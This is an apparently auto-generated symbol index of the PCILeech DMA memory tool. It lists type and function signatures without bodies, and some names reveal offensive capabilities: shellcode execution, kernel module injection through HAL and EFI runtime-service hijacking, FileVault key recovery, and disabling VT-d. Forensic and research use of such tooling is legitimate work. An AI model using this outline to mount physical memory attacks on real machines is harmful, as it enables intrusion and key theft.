type DOKAN_OPERATIONS (line 240) | typedef struct _DOKAN_OPERATIONS {
FILE: includes/fileinfo.h
type FILE_INFORMATION_CLASS (line 61) | typedef enum _FILE_INFORMATION_CLASS {
type FS_INFORMATION_CLASS (line 150) | typedef enum _FSINFOCLASS {
type FILE_ALIGNMENT_INFORMATION (line 171) | typedef struct _FILE_ALIGNMENT_INFORMATION {
type FILE_NAME_INFORMATION (line 186) | typedef struct _FILE_NAME_INFORMATION {
type FILE_ATTRIBUTE_TAG_INFORMATION (line 203) | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
type FILE_DISPOSITION_INFORMATION (line 222) | typedef struct _FILE_DISPOSITION_INFORMATION {
type FILE_DISPOSITION_INFORMATION_EX (line 243) | typedef struct _FILE_DISPOSITION_INFORMATION_EX {
type FILE_END_OF_FILE_INFORMATION (line 262) | typedef struct _FILE_END_OF_FILE_INFORMATION {
type FILE_VALID_DATA_LENGTH_INFORMATION (line 275) | typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
type FILE_BASIC_INFORMATION (line 289) | typedef struct _FILE_BASIC_INFORMATION {
type FILE_STANDARD_INFORMATION (line 319) | typedef struct _FILE_STANDARD_INFORMATION {
type FILE_POSITION_INFORMATION (line 348) | typedef struct _FILE_POSITION_INFORMATION {
type FILE_DIRECTORY_INFORMATION (line 359) | typedef struct _FILE_DIRECTORY_INFORMATION {
type FILE_FULL_DIR_INFORMATION (line 425) | typedef struct _FILE_FULL_DIR_INFORMATION {
type FILE_ID_FULL_DIR_INFORMATION (line 495) | typedef struct _FILE_ID_FULL_DIR_INFORMATION {
type FILE_BOTH_DIR_INFORMATION (line 570) | typedef struct _FILE_BOTH_DIR_INFORMATION {
type FILE_ID_BOTH_DIR_INFORMATION (line 647) | typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
type FILE_ID_EXTD_BOTH_DIR_INFORMATION (line 729) | typedef struct _FILE_ID_EXTD_BOTH_DIR_INFORMATION {
type FILE_NAMES_INFORMATION (line 814) | typedef struct _FILE_NAMES_INFORMATION {
type FILE_INTERNAL_INFORMATION (line 849) | typedef struct _FILE_INTERNAL_INFORMATION {
type FILE_ID_INFORMATION (line 865) | typedef struct _FILE_ID_INFORMATION {
type FILE_EA_INFORMATION (line 883) | typedef struct _FILE_EA_INFORMATION {
type FILE_ACCESS_INFORMATION (line 896) | typedef struct _FILE_ACCESS_INFORMATION {
type FILE_MODE_INFORMATION (line 910) | typedef struct _FILE_MODE_INFORMATION {
type FILE_ALL_INFORMATION (line 931) | typedef struct _FILE_ALL_INFORMATION {
type FILE_ALLOCATION_INFORMATION (line 958) | typedef struct _FILE_ALLOCATION_INFORMATION {
type FILE_LINK_INFORMATION (line 972) | typedef struct _FILE_LINK_INFORMATION {
type FILE_RENAME_INFORMATION (line 1004) | typedef struct _FILE_RENAME_INFORMATION {
type FILE_STREAM_INFORMATION (line 1035) | typedef struct _FILE_STREAM_INFORMATION {
type FILE_FS_LABEL_INFORMATION (line 1066) | typedef struct _FILE_FS_LABEL_INFORMATION {
type FILE_FS_VOLUME_INFORMATION (line 1083) | typedef struct _FILE_FS_VOLUME_INFORMATION {
type FILE_FS_SIZE_INFORMATION (line 1112) | typedef struct _FILE_FS_SIZE_INFORMATION {
type FILE_FS_FULL_SIZE_INFORMATION (line 1139) | typedef struct _FILE_FS_FULL_SIZE_INFORMATION {
type FILE_FS_ATTRIBUTE_INFORMATION (line 1170) | typedef struct _FILE_FS_ATTRIBUTE_INFORMATION {
type FILE_NETWORK_OPEN_INFORMATION (line 1197) | typedef struct _FILE_NETWORK_OPEN_INFORMATION {
type FILE_NETWORK_PHYSICAL_NAME_INFORMATION (line 1239) | typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
type UNICODE_STRING (line 1343) | typedef struct _UNICODE_STRING {
FILE: includes/leechcore.h
type QWORD (line 34) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 42) | typedef void VOID, *PVOID, *HANDLE, **PHA...
type QWORD (line 43) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIZE_T (line 44) | typedef size_t SIZE_T, *PSIZE_T;
type FILETIME (line 45) | typedef uint64_t FILETIME, *PFILETIME;
type DWORD (line 46) | typedef uint32_t DWORD, *PDWORD, *LPDWORD, BO...
type WORD (line 47) | typedef uint16_t WORD, *PWORD;
type BYTE (line 48) | typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
type CHAR (line 49) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 51) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type LC_CONFIG (line 101) | typedef struct LC_CONFIG {
type LC_CONFIG_ERRORINFO (line 118) | typedef struct tdLC_CONFIG_ERRORINFO {
function EXPORTED_FUNCTION (line 137) | EXPORTED_FUNCTION _Success_(return != NULL)
type LC_STATISTICS (line 514) | typedef struct tdLC_STATISTICS {
type LC_MEMMAP_ENTRY (line 524) | typedef struct tdLC_MEMMAP_ENTRY {
type LC_ARCH_TP (line 530) | typedef enum tdLC_ARCH_TP {
type LC_TLP (line 547) | typedef struct tdLC_TLP {
type VOID (line 558) | typedef VOID(*PLC_TLP_FUNCTION_CALLBACK)(
type LC_VMM (line 580) | typedef struct tdLC_VMM {
type LC_BAR (line 595) | typedef struct tdLC_BAR {
type LC_BAR_REQUEST (line 606) | typedef struct tdLC_BAR_REQUEST {
type VOID (line 629) | typedef VOID(*PLC_BAR_FUNCTION_CALLBACK)(_Inout_ PLC_BAR_REQUEST pBarReq...
FILE: includes/leechgrpc.h
type VOID (line 39) | typedef void VOID, *PVOID, *HANDLE;
type SIZE_T (line 40) | typedef size_t SIZE_T;
type DWORD (line 41) | typedef uint32_t DWORD, BOOL;
type BYTE (line 42) | typedef uint8_t BYTE, *PBYTE;
type CHAR (line 43) | typedef char CHAR, *LPSTR;
FILE: includes/public.h
type DOKAN_UNICODE_STRING_INTERMEDIATE (line 128) | typedef struct _DOKAN_UNICODE_STRING_INTERMEDIATE {
type DOKAN_NOTIFY_PATH_INTERMEDIATE (line 141) | typedef struct _DOKAN_NOTIFY_PATH_INTERMEDIATE {
type DOKAN_ACCESS_STATE_INTERMEDIATE (line 153) | typedef struct _DOKAN_ACCESS_STATE_INTERMEDIATE {
type DOKAN_ACCESS_STATE (line 176) | typedef struct _DOKAN_ACCESS_STATE {
type DOKAN_IO_SECURITY_CONTEXT_INTERMEDIATE (line 195) | typedef struct _DOKAN_IO_SECURITY_CONTEXT_INTERMEDIATE {
type DOKAN_IO_SECURITY_CONTEXT (line 201) | typedef struct _DOKAN_IO_SECURITY_CONTEXT {
type CREATE_CONTEXT (line 206) | typedef struct _CREATE_CONTEXT {
type CLEANUP_CONTEXT (line 217) | typedef struct _CLEANUP_CONTEXT {
type CLOSE_CONTEXT (line 223) | typedef struct _CLOSE_CONTEXT {
type DIRECTORY_CONTEXT (line 229) | typedef struct _DIRECTORY_CONTEXT {
type READ_CONTEXT (line 241) | typedef struct _READ_CONTEXT {
type WRITE_CONTEXT (line 248) | typedef struct _WRITE_CONTEXT {
type FILEINFO_CONTEXT (line 258) | typedef struct _FILEINFO_CONTEXT {
type SETFILE_CONTEXT (line 265) | typedef struct _SETFILE_CONTEXT {
type VOLUME_CONTEXT (line 273) | typedef struct _VOLUME_CONTEXT {
type LOCK_CONTEXT (line 278) | typedef struct _LOCK_CONTEXT {
type FLUSH_CONTEXT (line 286) | typedef struct _FLUSH_CONTEXT {
type UNMOUNT_CONTEXT (line 291) | typedef struct _UNMOUNT_CONTEXT {
type SECURITY_CONTEXT (line 296) | typedef struct _SECURITY_CONTEXT {
type SET_SECURITY_CONTEXT (line 303) | typedef struct _SET_SECURITY_CONTEXT {
type EVENT_CONTEXT (line 311) | typedef struct _EVENT_CONTEXT {
type VOLUME_METRICS (line 340) | typedef struct _VOLUME_METRICS {
type EVENT_INFORMATION (line 360) | typedef struct _EVENT_INFORMATION {
type EVENT_DRIVER_INFO (line 454) | typedef struct _EVENT_DRIVER_INFO {
type EVENT_START (line 464) | typedef struct _EVENT_START {
type DOKAN_RENAME_INFORMATION (line 480) | typedef struct _DOKAN_RENAME_INFORMATION {
type DOKAN_LINK_INFORMATION (line 496) | typedef struct _DOKAN_LINK_INFORMATION {
type DOKAN_MOUNT_POINT_INFO (line 506) | typedef struct _DOKAN_MOUNT_POINT_INFO {
type DOKAN_LOG_MESSAGE (line 526) | typedef struct _DOKAN_LOG_MESSAGE {
FILE: includes/vmmdll.h
type QWORD (line 30) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 40) | typedef void VOID, *PVOID, *HANDLE, **PHA...
type QWORD (line 41) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIZE_T (line 42) | typedef size_t SIZE_T, *PSIZE_T;
type FILETIME (line 43) | typedef uint64_t FILETIME, *PFILETIME;
type DWORD (line 44) | typedef uint32_t DWORD, *PDWORD, *LPDWORD, BO...
type WORD (line 45) | typedef uint16_t WORD, *PWORD;
type BYTE (line 46) | typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
type CHAR (line 47) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 49) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type tdVMM_HANDLE (line 77) | struct tdVMM_HANDLE
type tdVMMVM_HANDLE (line 78) | struct tdVMMVM_HANDLE
type BYTE (line 79) | typedef BYTE OPAQUE_OB_HEADER[0x40];
function EXPORTED_FUNCTION (line 146) | EXPORTED_FUNCTION _Success_(return != NULL)
type SERVICE_STATUS (line 338) | typedef struct _SERVICE_STATUS {
type VMMDLL_VFS_FILELIST_EXINFO (line 369) | typedef struct tdVMMDLL_VFS_FILELIST_EXINFO {
type VMMDLL_VFS_FILELIST2 (line 386) | typedef struct tdVMMDLL_VFS_FILELIST2 {
type VMMDLL_VFS_FILELISTBLOB_ENTRY (line 393) | typedef struct tdVMMDLL_VFS_FILELISTBLOB_ENTRY {
type VMMDLL_VFS_FILELISTBLOB (line 399) | typedef struct tdVMMDLL_VFS_FILELISTBLOB {
function EXPORTED_FUNCTION (line 433) | EXPORTED_FUNCTION
type VMMDLL_FORENSIC_JSONDATA (line 551) | typedef struct tdVMMDLL_FORENSIC_JSONDATA {
type VMMDLL_FORENSIC_INGEST_OBJECT_TYPE (line 570) | typedef enum tdVMMDLL_FORENSIC_INGEST_OBJECT_TYPE {
type VMMDLL_FORENSIC_INGEST_OBJECT (line 574) | typedef struct tdVMMDLL_FORENSIC_INGEST_OBJECT {
type VMMDLL_FORENSIC_INGEST_PHYSMEM (line 585) | typedef struct tdVMMDLL_FORENSIC_INGEST_PHYSMEM {
type VMMDLL_FORENSIC_INGEST_VIRTMEM (line 595) | typedef struct tdVMMDLL_FORENSIC_INGEST_VIRTMEM {
type VMMDLL_PLUGIN_REGINFO (line 608) | typedef struct tdVMMDLL_PLUGIN_REGINFO {
function EXPORTED_FUNCTION (line 704) | EXPORTED_FUNCTION _Success_(return != 0)
type VMMDLL_MAP_VADENTRY (line 1176) | typedef struct tdVMMDLL_MAP_VADENTRY {
type VMMDLL_MAP_VADEXENTRY (line 1214) | typedef struct tdVMMDLL_MAP_VADEXENTRY {
type VMMDLL_MODULE_TP (line 1231) | typedef enum tdVMMDLL_MODULE_TP {
type VMMDLL_MAP_MODULEENTRY_DEBUGINFO (line 1238) | typedef struct tdVMMDLL_MAP_MODULEENTRY_DEBUGINFO {
type VMMDLL_MAP_MODULEENTRY_VERSIONINFO (line 1246) | typedef struct tdVMMDLL_MAP_MODULEENTRY_VERSIONINFO {
type VMMDLL_MAP_MODULEENTRY (line 1257) | typedef struct tdVMMDLL_MAP_MODULEENTRY {
type VMMDLL_MAP_UNLOADEDMODULEENTRY (line 1277) | typedef struct tdVMMDLL_MAP_UNLOADEDMODULEENTRY {
type VMMDLL_MAP_EATENTRY (line 1289) | typedef struct tdVMMDLL_MAP_EATENTRY {
type VMMDLL_MAP_IATENTRY (line 1299) | typedef struct tdVMMDLL_MAP_IATENTRY {
type VMMDLL_HEAP_TP (line 1316) | typedef enum tdVMMDLL_HEAP_TP {
type VMMDLL_HEAP_SEGMENT_TP (line 1322) | typedef enum tdVMMDLL_HEAP_SEGMENT_TP {
type VMMDLL_MAP_HEAP_SEGMENTENTRY (line 1334) | typedef struct tdVMMDLL_MAP_HEAP_SEGMENTENTRY {
type VMMDLL_MAP_HEAPENTRY (line 1341) | typedef struct tdVMMDLL_MAP_HEAPENTRY {
type VMMDLL_HEAPALLOC_TP (line 1349) | typedef enum tdVMMDLL_HEAPALLOC_TP {
type VMMDLL_MAP_HEAPALLOCENTRY (line 1361) | typedef struct tdVMMDLL_MAP_HEAPALLOCENTRY {
type VMMDLL_MAP_THREADENTRY (line 1367) | typedef struct tdVMMDLL_MAP_THREADENTRY {
type VMMDLL_MAP_THREAD_CALLSTACKENTRY (line 1398) | typedef struct tdVMMDLL_MAP_THREAD_CALLSTACKENTRY {
type VMMDLL_MAP_HANDLEENTRY (line 1410) | typedef struct tdVMMDLL_MAP_HANDLEENTRY {
type VMMDLL_MAP_POOL_TYPE (line 1427) | typedef enum tdVMMDLL_MAP_POOL_TYPE {
type VMM_MAP_POOL_TYPE_SUBSEGMENT (line 1434) | typedef enum tdVMM_MAP_POOL_TYPE_SUBSEGMENT {
type VMMDLL_MAP_POOLENTRYTAG (line 1443) | typedef struct tdVMMDLL_MAP_POOLENTRYTAG {
type VMMDLL_MAP_POOLENTRY (line 1455) | typedef struct tdVMMDLL_MAP_POOLENTRY {
type VMMDLL_MAP_KDEVICEENTRY (line 1471) | typedef struct tdVMMDLL_MAP_KDEVICEENTRY {
type VMMDLL_MAP_KDRIVERENTRY (line 1482) | typedef struct tdVMMDLL_MAP_KDRIVERENTRY {
type VMMDLL_MAP_KOBJECTENTRY (line 1493) | typedef struct tdVMMDLL_MAP_KOBJECTENTRY {
type VMMDLL_MAP_NETENTRY (line 1503) | typedef struct tdVMMDLL_MAP_NETENTRY {
type VMMDLL_MAP_PHYSMEMENTRY (line 1530) | typedef struct tdVMMDLL_MAP_PHYSMEMENTRY {
type VMMDLL_MAP_USERENTRY (line 1535) | typedef struct tdVMMDLL_MAP_USERENTRY {
type VMMDLL_VM_TP (line 1543) | typedef enum tdVMMDLL_VM_TP {
type VMMDLL_MAP_VMENTRY (line 1549) | typedef struct tdVMMDLL_MAP_VMENTRY {
type VMMDLL_MAP_SERVICEENTRY (line 1564) | typedef struct tdVMMDLL_MAP_SERVICEENTRY {
type VMMDLL_MAP_PTE (line 1580) | typedef struct tdVMMDLL_MAP_PTE {
type VMMDLL_MAP_VAD (line 1589) | typedef struct tdVMMDLL_MAP_VAD {
type VMMDLL_MAP_VADEX (line 1599) | typedef struct tdVMMDLL_MAP_VADEX {
type VMMDLL_MAP_MODULE (line 1606) | typedef struct tdVMMDLL_MAP_MODULE {
type VMMDLL_MAP_UNLOADEDMODULE (line 1615) | typedef struct tdVMMDLL_MAP_UNLOADEDMODULE {
type VMMDLL_MAP_EAT (line 1624) | typedef struct tdVMMDLL_MAP_EAT {
type VMMDLL_MAP_IAT (line 1640) | typedef struct tdVMMDLL_MAP_IAT {
type VMMDLL_MAP_HEAP (line 1650) | typedef struct tdVMMDLL_MAP_HEAP {
type VMMDLL_MAP_HEAPALLOC (line 1659) | typedef struct tdVMMDLL_MAP_HEAPALLOC {
type VMMDLL_MAP_THREAD (line 1667) | typedef struct tdVMMDLL_MAP_THREAD {
type VMMDLL_MAP_THREAD_CALLSTACK (line 1674) | typedef struct tdVMMDLL_MAP_THREAD_CALLSTACK {
type VMMDLL_MAP_HANDLE (line 1687) | typedef struct tdVMMDLL_MAP_HANDLE {
type VMMDLL_MAP_POOL (line 1696) | typedef struct tdVMMDLL_MAP_POOL {
type VMMDLL_MAP_KOBJECT (line 1707) | typedef struct tdVMMDLL_MAP_KOBJECT {
type VMMDLL_MAP_KDRIVER (line 1716) | typedef struct tdVMMDLL_MAP_KDRIVER {
type VMMDLL_MAP_KDEVICE (line 1725) | typedef struct tdVMMDLL_MAP_KDEVICE {
type VMMDLL_MAP_NET (line 1734) | typedef struct tdVMMDLL_MAP_NET {
type VMMDLL_MAP_PHYSMEM (line 1743) | typedef struct tdVMMDLL_MAP_PHYSMEM {
type VMMDLL_MAP_USER (line 1751) | typedef struct tdVMMDLL_MAP_USER {
type VMMDLL_MAP_VM (line 1760) | typedef struct tdVMMDLL_MAP_VM {
type VMMDLL_MAP_SERVICE (line 1769) | typedef struct tdVMMDLL_MAP_SERVICE {
function EXPORTED_FUNCTION (line 1788) | EXPORTED_FUNCTION
function EXPORTED_FUNCTION (line 2120) | EXPORTED_FUNCTION _Success_(return)
type VMMDLL_YARA_MEMORY_CALLBACK_CONTEXT (line 2247) | typedef struct tdVMMDLL_YARA_MEMORY_CALLBACK_CONTEXT {
function EXPORTED_FUNCTION (line 2268) | EXPORTED_FUNCTION _Success_(return)
type VMMDLL_MAP_PFN (line 2356) | typedef struct tdVMMDLL_MAP_PFN {
function EXPORTED_FUNCTION (line 2373) | EXPORTED_FUNCTION _Success_(return)
function EXPORTED_FUNCTION (line 2481) | EXPORTED_FUNCTION _Success_(return)
FILE: includes/vmmyara.h
type BOOL (line 41) | typedef uint32_t BOOL;
type VOID (line 42) | typedef void VOID, *PVOID, *HANDLE;
type SIZE_T (line 43) | typedef size_t SIZE_T;
type DWORD (line 44) | typedef uint32_t DWORD, *PDWORD;
type BYTE (line 45) | typedef uint8_t BYTE, *PBYTE;
type CHAR (line 46) | typedef char CHAR, *LPSTR;
type VMMYARA_ERROR (line 54) | typedef int VMMYARA_ERROR;
type HANDLE (line 55) | struct HANDLE
type VMMYARA_RULE_MATCH (line 216) | typedef struct tdVMMYARA_RULE_MATCH {
type BOOL (line 248) | typedef BOOL(*VMMYARA_SCAN_MEMORY_CALLBACK)(
FILE: pcileech/charutil.c
function BOOL (line 18) | BOOL CharUtil_IsAnsiA(_In_ LPCSTR sz)
function BOOL (line 29) | BOOL CharUtil_IsAnsiW(_In_ LPCWSTR wsz)
function BOOL (line 40) | BOOL CharUtil_IsAnsiFsA(_In_ LPCSTR sz)
function CharUtil_AtoU (line 68) | _Success_(return)
function CharUtil_UtoU (line 130) | _Success_(return)
function CharUtil_WtoU (line 190) | _Success_(return)
function CharUtil_UtoW (line 317) | _Success_(return)
function CharUtil_WtoW (line 407) | _Success_(return)
function VOID (line 422) | VOID CharUtil_EscapeJSON2(_In_ CHAR ch, _Out_writes_(2) PCHAR chj)
function VOID (line 436) | VOID CharUtil_EscapeJSON6(_In_ CHAR ch, _Out_writes_(6) PCHAR chj)
function CharUtil_UtoJ (line 464) | _Success_(return)
function CharUtil_AtoJ (line 533) | _Success_(return)
function CharUtil_WtoJ (line 612) | _Success_(return)
function CharUtil_UtoCSV (line 744) | _Success_(return)
function DWORD (line 844) | DWORD CharUtil_FixFsNameU(_Out_writes_(cbuDst) LPSTR uszDst, _In_ DWORD ...
function DWORD (line 907) | DWORD CharUtil_FixFsName(_Out_writes_(cbuDst) LPSTR uszOut, _In_ DWORD c...
function DWORD (line 969) | DWORD CharUtil_ReplaceMultiple(_Out_writes_(cbuDst) LPSTR uszOut, _In_ D...
function QWORD (line 999) | QWORD CharUtil_Hash64U(_In_opt_ LPCSTR usz, _In_ BOOL fUpper)
function QWORD (line 1022) | QWORD CharUtil_Hash64A(_In_opt_ LPCSTR sz, _In_ BOOL fUpper)
function QWORD (line 1038) | QWORD CharUtil_Hash64W(_In_opt_ LPCWSTR wsz, _In_ BOOL fUpper)
function DWORD (line 1063) | DWORD CharUtil_Hash32U(_In_opt_ LPCSTR usz, _In_ BOOL fUpper)
function DWORD (line 1086) | DWORD CharUtil_Hash32A(_In_opt_ LPCSTR sz, _In_ BOOL fUpper)
function DWORD (line 1102) | DWORD CharUtil_Hash32W(_In_opt_ LPCWSTR wsz, _In_ BOOL fUpper)
function DWORD (line 1133) | DWORD CharUtil_Internal_HashFs(_In_ LPSTR usz)
function DWORD (line 1150) | DWORD CharUtil_HashNameFsU(_In_ LPCSTR usz, _In_opt_ DWORD iSuffix)
function DWORD (line 1157) | DWORD CharUtil_HashNameFsA(_In_ LPCSTR sz, _In_opt_ DWORD iSuffix)
function DWORD (line 1164) | DWORD CharUtil_HashNameFsW(_In_ LPCWSTR wsz, _In_opt_ DWORD iSuffix)
function VOID (line 1179) | VOID CharUtil_ReplaceAllA(_Inout_ LPSTR sz, _In_ CHAR chOld, _In_ CHAR c...
function LPSTR (line 1200) | LPSTR CharUtil_PathSplitLastEx(_In_ LPCSTR usz, _Out_writes_(cbuPath) LP...
function LPSTR (line 1226) | LPSTR CharUtil_PathSplitLastInPlace(_Inout_ LPSTR usz)
function LPCSTR (line 1248) | LPCSTR CharUtil_PathSplitLast(_In_ LPCSTR usz)
function LPCSTR (line 1271) | LPCSTR CharUtil_PathSplitNext(_In_ LPCSTR usz)
function LPCSTR (line 1297) | LPCSTR CharUtil_SplitFirst(_In_ LPCSTR usz, _In_ CHAR ch, _Out_writes_(c...
function LPCSTR (line 1319) | LPCSTR CharUtil_SplitLast(_In_ LPCSTR usz, _In_ CHAR ch, _Out_writes_(cb...
function CharUtil_SplitList (line 1341) | _Success_(return)
function LPCSTR (line 1384) | LPCSTR CharUtil_PathSplitFirst(_In_ LPCSTR usz, _Out_writes_(cbu1) LPSTR...
function QWORD (line 1402) | QWORD CharUtil_HashPathFs_Internal(_In_ LPCSTR uszPathFs)
function QWORD (line 1422) | QWORD CharUtil_HashPathFsU(_In_ LPCSTR uszPath)
function QWORD (line 1427) | QWORD CharUtil_HashPathFsA(_In_ LPCSTR szPath)
function QWORD (line 1435) | QWORD CharUtil_HashPathFsW(_In_ LPCWSTR wszPath)
function BOOL (line 1454) | BOOL CharUtil_StrCmpAny(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_opt_...
function BOOL (line 1480) | BOOL CharUtil_StrCmpAnyEx(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_op...
function BOOL (line 1502) | BOOL CharUtil_StrCmpAll(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_opt_...
function BOOL (line 1525) | BOOL CharUtil_StrEndsWith(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszEndsWi...
function BOOL (line 1544) | BOOL CharUtil_StrStartsWith(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszStar...
function BOOL (line 1561) | BOOL CharUtil_StrEquals(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR usz2, _In_ ...
function LPCSTR (line 1579) | LPCSTR CharUtil_StrContains(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszSubS...
function CharUtil_CmpWU (line 1626) | int CharUtil_CmpWU(_In_opt_ LPWSTR wsz1, _In_opt_ LPSTR usz2, _In_ BOOL ...
function CharUtil_CmpWW (line 1644) | int CharUtil_CmpWW(_In_opt_ LPCWSTR wsz1, _In_opt_ LPCWSTR wsz2, _In_ BO...
FILE: pcileech/charutil.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type BOOL (line 391) | typedef BOOL(*CHARUTIL_STRCMP_PFN)(_In_opt_ LPCSTR usz1, _In_opt_ LPCSTR...
FILE: pcileech/device.c
function DeviceReadDMA_Retry (line 12) | _Success_(return)
function DeviceWriteDMA_Retry (line 18) | _Success_(return)
function DeviceWriteDMA_Verify (line 24) | _Success_(return)
function DWORD (line 37) | DWORD DeviceReadDMA(_In_ QWORD pa, _In_ DWORD cb, _Out_writes_(cb) PBYTE...
function DeviceOpen2_SetCustomMemMap (line 71) | _Success_(return)
function DeviceOpen2_RequestUserInput (line 108) | _Success_(return)
function DeviceOpen2_RequestUserInput (line 141) | _Success_(return)
function DeviceOpen2 (line 148) | _Success_(return)
function DeviceOpen (line 209) | _Success_(return)
function DeviceWriteMEM (line 222) | _Success_(return)
function DeviceReadMEM (line 231) | _Success_(return)
FILE: pcileech/executor.c
type EXEC_IO (line 16) | typedef struct tdEXEC_IO {
type CONSOLEREDIR_THREADDATA (line 33) | typedef struct tdCONSOLEREDIR_THREADDATA {
type EXEC_HANDLE (line 43) | typedef struct tdEXEC_HANDLE {
function DWORD (line 56) | DWORD WINAPI ConsoleRedirect_ThreadConsoleInput(PCONSOLEREDIR_THREADDATA...
function DWORD (line 78) | DWORD WINAPI ConsoleRedirect_ThreadConsoleOutput(PCONSOLEREDIR_THREADDAT...
function BOOL (line 90) | BOOL Exec_ConsoleRedirect_Initialize(_In_ QWORD ConsoleBufferAddr_InputS...
function VOID (line 115) | VOID Exec_ConsoleRedirect(_In_ QWORD ConsoleBufferAddr_InputStream, _In_...
function Exec_Callback (line 145) | _Success_(return)
function VOID (line 206) | VOID Exec_CallbackClose(_In_opt_ HANDLE hCallback)
function Exec_ExecSilent (line 227) | _Success_(return)
function VOID (line 278) | VOID ActionExecShellcode()
function VOID (line 408) | VOID ActionAgentExecPy()
function DWORD (line 457) | DWORD ActionAgentForensic_OutFileDirectory(_Out_writes_z_(MAX_PATH) LPST...
function VOID (line 478) | VOID ActionAgentForensic_GetFile(_In_ LPSTR szRemoteFile, _In_ LPSTR szO...
function VOID (line 520) | VOID ActionAgentForensic()
function VOID (line 623) | VOID ActionAgentForensic()
FILE: pcileech/extra.c
function VOID (line 10) | VOID Extra_MacFVRecover_ReadMemory_Optimized(_Inout_ PBYTE pb512M)
function BOOL (line 23) | BOOL Extra_MacFVRecover_Analyze(_In_ PBYTE pb512M)
function VOID (line 76) | VOID Extra_MacFVRecover_SetOutFileName()
function VOID (line 95) | VOID Action_MacFilevaultRecover(_In_ BOOL IsRebootRequired)
function VOID (line 147) | VOID Action_MacDisableVtd()
function VOID (line 183) | VOID Action_PT_Phys2Virt()
function VOID (line 203) | VOID Action_PT_Virt2Phys()
function VOID (line 225) | VOID Action_TlpTx_DummyCB(_In_opt_ PVOID ctx, _In_ DWORD cbTlp, _In_ PBY...
function VOID (line 230) | VOID Action_TlpTx()
function VOID (line 255) | VOID Action_TlpTxLoop()
function VOID (line 310) | VOID Action_RegCfgReadWrite()
function VOID (line 393) | VOID Extra_BarReadWriteCallback(_Inout_ PLC_BAR_REQUEST pBarRequest)
function VOID (line 435) | VOID Extra_BarReadWriteInitialize()
function QWORD (line 476) | QWORD Extra_Benchmark_ReadSingle(_In_ PPMEM_SCATTER ppMEMs, _In_ QWORD cb)
function VOID (line 520) | VOID Action_Benchmark()
FILE: pcileech/help.c
function VOID (line 10) | VOID ShowListFiles(_In_ LPSTR szSearchPattern, _In_ DWORD cchSpaces, _In...
function VOID (line 28) | VOID Help_ShowGeneral()
function VOID (line 181) | VOID Help_ShowInfo()
function VOID (line 228) | VOID _HelpShowExecCommand()
function VOID (line 249) | VOID Help_ShowDetailed()
FILE: pcileech/kmd.c
type KMDHANDLE_S12 (line 14) | typedef struct tdKMDHANDLE_S12 {
type KERNELSEEKER (line 25) | typedef struct tdKERNELSEEKER {
function KMD_FindSignature2 (line 47) | _Success_(return)
function KMD_FindSignature1 (line 80) | _Success_(return)
function KMD_FindSignature_EfiRuntimeServices (line 120) | _Success_(return)
function BOOL (line 175) | BOOL KMD_MacOSIsKernelAddress(_In_ PBYTE pbPage)
function KMD_MacOSKernelGetBase (line 189) | _Success_(return)
function KMD_MacOSKernelSeekSignature (line 213) | _Success_(return)
function KMD_FreeBSDKernelSeekSignature (line 244) | _Success_(return)
type KALLSYMS_SYMBOL (line 297) | typedef struct tdKALLSYMS_SYMBOL {
function POB_MAP (line 308) | POB_MAP KMD_Kallsyms_Collect(_In_reads_bytes_(cb) PBYTE pb, _In_ DWORD c...
function POB_MAP (line 558) | POB_MAP KMD_Kallsyms(_In_reads_bytes_(cb) PBYTE pb, _In_ DWORD cb)
function VOID (line 589) | VOID KMD_LinuxFindFunctionAddrTBL_FromKallsyms(_In_ PBYTE pb, _In_ DWORD...
function DWORD (line 631) | DWORD KMD_LinuxFindFunctionAddr(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKERN...
function VOID (line 649) | VOID KMD_LinuxFindFunctionAddrTBL_Absolute(_In_ PBYTE pb, _In_ DWORD cb,...
function KMD_LinuxFindFunctionAddrTBL_RelativeSymTabSearch (line 669) | _Success_(return)
function QWORD (line 686) | QWORD KMD_LinuxFindFunctionAddrTBL_FromSystemMap_GetAddressFromName(_In_...
function VOID (line 695) | VOID KMD_LinuxFindFunctionAddrTBL_FromSystemMap(_In_ PBYTE pb, _In_ DWOR...
function VOID (line 720) | VOID KMD_LinuxFindFunctionAddrTBL_Relative(_In_ PBYTE pb, _In_ DWORD cb,...
function VOID (line 749) | VOID KMD_LinuxFindFunctionAddrTBL(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKE...
function KMD_Linux46KernelSeekSignature (line 757) | _Success_(return)
function QWORD (line 795) | QWORD KMD_Linux48KernelBaseSeek()
function VOID (line 856) | VOID KMD_Linux48KernelSeekSignature_KallsymsFromKDBGetSym(_In_reads_(KMD...
function KMD_Linux48KernelSeekSignature (line 875) | _Success_(return)
function KMDOpen_LinuxEfiRuntimeServicesHijack (line 923) | _Success_(return)
function KMD_Win_SearchTableHalpApicRequestInterrupt (line 1015) | _Success_(return)
function KMDOpen_UEFI_FindEfiBase (line 1034) | _Success_(return)
function KMDOpen_UEFI (line 1073) | _Success_(return)
function KMDOpen_WINX64_2_VMM (line 1166) | _Success_(return)
function KMDOpen_WINX64_3_VMM (line 1348) | _Success_(return)
function KMDOpen_HalHijack (line 1487) | _Success_(return)
function KMD_IsRangeInPhysicalMap (line 1595) | _Success_(return)
function KMD_SubmitCommand (line 1609) | _Success_(return)
